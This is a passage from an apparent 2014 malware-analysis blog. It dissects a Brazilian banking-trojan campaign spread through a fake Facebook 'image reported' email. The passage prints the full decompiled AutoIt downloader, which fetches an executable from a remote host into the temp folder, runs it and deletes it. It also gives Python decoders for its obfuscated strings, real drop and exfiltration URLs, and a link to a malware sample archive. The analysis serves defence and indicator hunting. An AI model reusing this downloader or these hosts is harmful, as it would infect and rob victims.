<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">containing this obfuscated data.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">2903</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">2903</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">2903</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">DA19D716CF4023103CD30951FA7FA64A90DA17DB19DC1031B2B142F60C200422DC4093C5618AAD0521BF77DF7DC6D46D80BB7997413CE811C979FB3931F51CAF</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">0634F23DE455C8B55E89B6033EE60FC60B53E4016790568C9F46F1161529D20927DC7290EA18D263</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">D456D755</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Which correspond to:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">0</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">0</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">0</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">http://ecole.saintlumine.free.fr/ecolesaintlu/images/notify.php</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">http://agsportualit.com/web/config1.txt</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">777</span></b></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Decryptor I programmed to perform this task.</span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU7KW03BR7T3V6sowLYIu2VrgWVESccqawWTWJXCD9-iGGZsi2GPFs4S-EDTIU1KcGGG1hjYTslHmm6fLXHSTglOR4IPzFkmflKJsx2AQ2EVOf49kINCRPCjyz-9X684oVPA0ndM0wBmY/s1600/desc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU7KW03BR7T3V6sowLYIu2VrgWVESccqawWTWJXCD9-iGGZsi2GPFs4S-EDTIU1KcGGG1hjYTslHmm6fLXHSTglOR4IPzFkmflKJsx2AQ2EVOf49kINCRPCjyz-9X684oVPA0ndM0wBmY/s1600/desc.jpg" height="233" width="320" /></a></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The PHP page is where the stolen data is sent.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Samples: https://www.dropbox.com/s/3vj3igmnfuvn1lf/Intimacao%20de%20n.%209743872-malware-27-11-14.rar?dl=0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2014</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<div class="separator" style="clear: both; font-family: 'Times New Roman'; font-size: medium;">
<br /></div>
</div>
</span></div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-90932150809805196652014-11-13T07:15:00.002-08:002014-11-13T07:15:39.425-08:00<span style="font-family: Arial, Helvetica, sans-serif;"><b>Fake Facebook image report.</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Yesterday they sent out a message about a supposed image that had been reported as inappropriate on Facebook.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The text is in Portuguese, so it is most likely, as on previous occasions, a downloader for a Brazilian banking trojan.</span><br />
<br />
<h2 class="rmSubject" style="color: #444444; font-family: 'Segoe UI Light', 'Segoe UI Web Light', 'Segoe UI Web Regular', 'Segoe UI', 'Segoe UI Symbol', HelveticaNeue-Light, 'Helvetica Neue', Arial, sans-serif; font-size: 21px; font-weight: normal; line-height: 29.9904003143311px; margin: 0px 0px 13px; padding-top: 2px; text-align: center;">
Fw: Uma imagem postada em sua linha do tempo foi denunciada!</h2>
<div>
<strong style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 21.2999992370605px; text-align: -webkit-center;">ATENÇÃO:</strong><span style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 21.2999992370605px; text-align: -webkit-center;"> Denúncia de imagem de caráter impróprio constando em sua linha do tempo.</span></div>
<div>
<span style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 21.2999992370605px; text-align: -webkit-center;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ptDvPjRjFHFVnCP-gp-LZFIqBq4P3GxA1Vi1pLFcPZDKnx2i2ibocP0ImAhGdde8ELS8yTD4psgFefXdx1uq15jN_CJMZtR9tag0xDC8waR7lFQWKO8bdBcQe6uE-tZfDFaEDk-OmZ8/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ptDvPjRjFHFVnCP-gp-LZFIqBq4P3GxA1Vi1pLFcPZDKnx2i2ibocP0ImAhGdde8ELS8yTD4psgFefXdx1uq15jN_CJMZtR9tag0xDC8waR7lFQWKO8bdBcQe6uE-tZfDFaEDk-OmZ8/s400/01.jpg" width="372" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The link downloads an executable.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAPCncp1_xdMVbQ5cA9t0HbLI9-AW1750_ybZtxH7y8lTeBCAuqcPkOmGShHWYDtrqtwu0SzfCQc6jw1LcW6xRcqDsdJ8iBCpJt6NWVO4TlpWW-zYUXInW1BcqAwW8H2x24PJSd7vEl8/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAPCncp1_xdMVbQ5cA9t0HbLI9-AW1750_ybZtxH7y8lTeBCAuqcPkOmGShHWYDtrqtwu0SzfCQc6jw1LcW6xRcqDsdJ8iBCpJt6NWVO4TlpWW-zYUXInW1BcqAwW8H2x24PJSd7vEl8/s320/02.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analyzed on V.T., it shows a very low detection rate.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWi-9xS67FUiMKouiI3hmuB5nA8_Xfy_UHXMLBMjtdkch36xtjcFUdlLThyphenhyphena_Ug9ng9EqmsM_7By0QI8USV4nR6yFdqtLyAE5vmbRxLZtaQ4yRwE_ZautNHxA4oyozfNcdCLUyTeW0bHs/s1600/VT.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWi-9xS67FUiMKouiI3hmuB5nA8_Xfy_UHXMLBMjtdkch36xtjcFUdlLThyphenhyphena_Ug9ng9EqmsM_7By0QI8USV4nR6yFdqtLyAE5vmbRxLZtaQ4yRwE_ZautNHxA4oyozfNcdCLUyTeW0bHs/s320/VT.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The binary is compiled with AutoIt and contains an obfuscated script.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC8IqIuMPfeWr9gSmv9EgD2BuHn9WQAIMoqxpwNpVkhU3VcSJirQm_o3PvBu3CNwKsIAPTOaZuY9aBlM46_4jmu7qDDy7ecf3mXViI36SQYLQ-61wwoC8P6JF6MhnHefYphMeXoKEdMKg/s1600/03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC8IqIuMPfeWr9gSmv9EgD2BuHn9WQAIMoqxpwNpVkhU3VcSJirQm_o3PvBu3CNwKsIAPTOaZuY9aBlM46_4jmu7qDDy7ecf3mXViI36SQYLQ-61wwoC8P6JF6MhnHefYphMeXoKEdMKg/s320/03.png" width="320" /></a></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Using the <a href="https://exe2aut.com/">exe2aut</a> tool we get to the script, which is the following:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSmZlCm867Lq5KIH2OAGktpdW0VrO5YvD4NeYx1uRNwfYmbvw4zpU9siuJo9VVa7rKkFgvZeI8XniZBUdBKM2pS_UOdkOGO-sSrtARWvPAwCGQJ8EM-6WeQUBxJuI_eSrGmlJygFxMaQA/s1600/04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSmZlCm867Lq5KIH2OAGktpdW0VrO5YvD4NeYx1uRNwfYmbvw4zpU9siuJo9VVa7rKkFgvZeI8XniZBUdBKM2pS_UOdkOGO-sSrtARWvPAwCGQJ8EM-6WeQUBxJuI_eSrGmlJygFxMaQA/s400/04.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">#Region</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">#EndRegion</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">If FileExists(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")) Then</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EndIf</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$urldownloader = chesdvgnqzaltbe("]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ")</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$directory = @TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">InetGet($urldownloader, $directory)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$m01837778 = Sleep(10000)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">$y98384632 = Sleep(10000)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Run($directory)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Sleep(9000)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Local $ifgewtqghstvbbjs</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>For $i = 1 To StringLen($plsjkdmhgsfhjksiew)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Next</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Return $ifgewtqghstvbbjs</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EndFunc</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">We can see that there are encoded strings:</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Q_hXg^e#ZmZ</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The function <b>chesdvgnqzaltbe</b> is responsible for decoding the string by adding 11 to the ordinal value of each character.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Local $ifgewtqghstvbbjs</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>For $i = 1 To StringLen($plsjkdmhgsfhjksiew)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Next</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Return $ifgewtqghstvbbjs</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EndFunc</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">With a small Python program we can do the same job.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># Encoded string taken from the decompiled AutoIt script</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cadena = ']iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">def sumab(texto):</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span># Same as chesdvgnqzaltbe(): add 11 to each character's code</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>data = []</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>for k in range(len(texto)):</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>se = ord(texto[k])</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>xx = se + 11</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>data += [chr(xx)]</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>return data</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">salida = sumab(cadena)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># Join the decoded characters back into one string and show it</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ca = ''.join(salida)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">print(ca)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">So the strings correspond to the following:</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://communicare.net.ec/xmlrpc/cache/jscrip.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">Q_hXg^e#ZmZ</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\jscrip.exe</span></div>
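<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">As an added example (my own code, not from the original post), here is a Python 3 version of the decoder generalized to what an analyst usually needs next when triaging one of these AutoIt downloaders: it pulls every literal passed to <b>chesdvgnqzaltbe()</b> out of the decompiled script, decodes them all, extracts the download URL as an indicator for blocking or hunting, and, for a future sample where the shift constant is not 11, brute-forces the offset by scoring the candidate outputs. The embedded script fragment is a constructed copy of the lines shown above; the plausibility scoring is an assumption of mine, tuned for downloader strings like these.</span></div>

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the relevant lines of the decompiled AutoIt
# script shown in the post, embedded inline so this runs offline.
SAMPLE_SCRIPT = r'''
If FileExists(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")) Then
    FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))
EndIf
$urldownloader = chesdvgnqzaltbe("]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ")
$directory = @TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")
InetGet($urldownloader, $directory)
Run($directory)
'''

URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)


def shift_decode(encoded: str, offset: int = 11) -> str:
    """Python equivalent of chesdvgnqzaltbe(): add `offset` to each char code."""
    return ''.join(chr(ord(c) + offset) for c in encoded)


def extract_encoded_strings(script: str, func_name: str = 'chesdvgnqzaltbe') -> List[str]:
    """Return every distinct literal passed to the decoder function, in script order."""
    call_re = re.compile(re.escape(func_name) + r'\("([^"]*)"\)')
    found: List[str] = []
    for match in call_re.finditer(script):
        literal = match.group(1)
        if literal not in found:
            found.append(literal)
    return found


def decode_all(script: str, func_name: str = 'chesdvgnqzaltbe', offset: int = 11) -> Dict[str, str]:
    """Map each encoded literal found in the script to its decoded form."""
    return {enc: shift_decode(enc, offset) for enc in extract_encoded_strings(script, func_name)}


def _plausibility(text: str) -> int:
    # Heuristic (assumption): URL/path-like characters score one point each,
    # and the markers "http" / ".exe" typical of a downloader score extra.
    score = sum(1 for c in text if c.isalnum() or c in '/.:\\-_')
    lower = text.lower()
    if 'http' in lower:
        score += 10
    if '.exe' in lower:
        score += 5
    return score


def guess_offset(encoded: str, candidates=range(-40, 41)) -> Optional[Tuple[int, str]]:
    """Recover the shift constant when it is not known yet: try every candidate,
    keep only fully printable ASCII output, and return the best-scoring
    (offset, decoded) pair, or None if nothing printable came out."""
    best: Optional[Tuple[int, str]] = None
    best_score = -1
    for off in candidates:
        if off == 0:
            continue
        codes = [ord(c) + off for c in encoded]
        if any(code < 0x20 or code > 0x7E for code in codes):
            continue
        candidate = ''.join(chr(code) for code in codes)
        score = _plausibility(candidate)
        if score > best_score:
            best, best_score = (off, candidate), score
    return best


def extract_urls(decoded: Dict[str, str]) -> List[str]:
    """Pull download URLs out of the decoded strings for blocklisting / hunting."""
    urls: List[str] = []
    for value in decoded.values():
        urls.extend(URL_RE.findall(value))
    return urls


if __name__ == '__main__':
    table = decode_all(SAMPLE_SCRIPT)
    for enc, dec in table.items():
        print(f'{enc!r} -> {dec!r}')
    print('URLs:', extract_urls(table))
    print('guessed offset:', guess_offset(']iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ'))
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Note that the decoded file name starts with a backslash (<b>@TempDir</b> plus <b>\jscrip.exe</b>), which is the full drop path the downloader writes to and later runs; together with the URL it is the indicator worth keeping from this sample.</span></div>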
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Unfortunately for our analysis, the site hosting the payload has exceeded its bandwidth quota.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGIyXWu_1rjBsbktkwXsaxPhVQKPW9eQMbsgePKIcpdSUOFEKjXKn1hIDa_1weFfbcliKpuA5ZeaI3MXZqyDV6QWY6bhs1MGeYSyfqLesPGZNhSTgSdUO3bDC-tSOZVvzT9kMvKo9SLGc/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGIyXWu_1rjBsbktkwXsaxPhVQKPW9eQMbsgePKIcpdSUOFEKjXKn1hIDa_1weFfbcliKpuA5ZeaI3MXZqyDV6QWY6bhs1MGeYSyfqLesPGZNhSTgSdUO3bDC-tSOZVvzT9kMvKo9SLGc/s400/03.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Dynamic analysis leads us to the same result.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Here is a capture of the network traffic.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM12IjbXG6cLsjRgXi9X632YZOmOnp0VTPcn9z8sjdG9TlW7r-3MZZ0robuPissHbSVFcz9KqtaoCMXyLcycWiH0atNt7Mr0Z0GC6yFSjuAjX8KaRTF6UtCD36q8c7KGM6iAvaK-E5SM/s1600/05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM12IjbXG6cLsjRgXi9X632YZOmOnp0VTPcn9z8sjdG9TlW7r-3MZZ0robuPissHbSVFcz9KqtaoCMXyLcycWiH0atNt7Mr0Z0GC6yFSjuAjX8KaRTF6UtCD36q8c7KGM6iAvaK-E5SM/s320/05.png" width="320" /></a></div>
<div>
<span style="background-color: white; color: #444444; font-family: Calibri, sans-serif; font-size: 15px; line-height: 21.2999992370605px; text-align: -webkit-center;"><br /></span></div>
<br />
